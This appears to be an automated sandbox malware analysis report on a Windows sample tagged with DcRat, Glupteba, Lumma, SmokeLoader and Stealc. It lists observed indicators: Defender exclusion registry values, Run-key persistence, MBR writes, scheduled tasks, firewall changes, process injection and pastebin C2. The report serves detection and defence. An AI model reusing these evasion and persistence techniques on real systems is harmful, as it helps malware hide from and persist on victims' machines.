Malware Analysis Report

2024-11-30 04:55

Sample ID 240223-fe56eabb6t
Target 5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d
SHA256 5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d
Tags
dcrat glupteba lumma smokeloader stealc pub1 backdoor bootkit discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d

Threat Level: Known bad

The file 5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d was found to be: Known bad.

Malicious Activity Summary

dcrat glupteba lumma smokeloader stealc pub1 backdoor bootkit discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan upx

Stealc

Glupteba payload

DcRat

Windows security bypass

Glupteba

Lumma Stealer

SmokeLoader

Creates new service(s)

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Loads dropped DLL

Windows security modification

Reads user/profile data of web browsers

Deletes itself

UPX packed file

Reads data files stored by FTP clients

Executes dropped EXE

Manipulates WinMonFS driver.

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Drops file in System32 directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Launches sc.exe

Program crash

Enumerates physical storage devices

Unsigned PE

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-23 04:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-23 04:48

Reported

2024-02-23 04:53

Platform

win10-20240221-en

Max time kernel

300s

Max time network

304s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\C12D.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\C12D.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\E5A0.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\system32\wusa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\Conhost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4312 set thread context of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 916 set thread context of 1320 N/A C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe C:\Windows\system32\conhost.exe
PID 916 set thread context of 2624 N/A C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe C:\Windows\explorer.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\134A.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\134A.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\134A.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hucvvwd N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hucvvwd N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hucvvwd N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\wusa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\Conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Windows\windefender.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2511 = "Lord Howe Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\Conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\wusa.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\wusa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\wusa.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\Conhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
